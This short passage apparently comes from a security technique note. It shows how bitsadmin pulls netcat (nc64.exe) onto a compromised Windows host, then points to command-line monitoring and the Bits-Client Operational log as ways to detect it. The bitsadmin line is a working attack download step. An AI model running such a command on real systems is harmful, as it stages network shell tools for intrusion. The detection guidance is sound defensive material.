File upload to the compromised system.
bitsadmin /transfer myjob /download /priority high http://10.0.0.5/nc64.exe c:\temp\nc.exe
Commandline arguments monitoring can help discover bitsadmin usage:
Application Logs > Microsoft > Windows > Bits-Client > Operationalshows logs related to jobs, which you may want to monitor as well. An example of one of the jobs: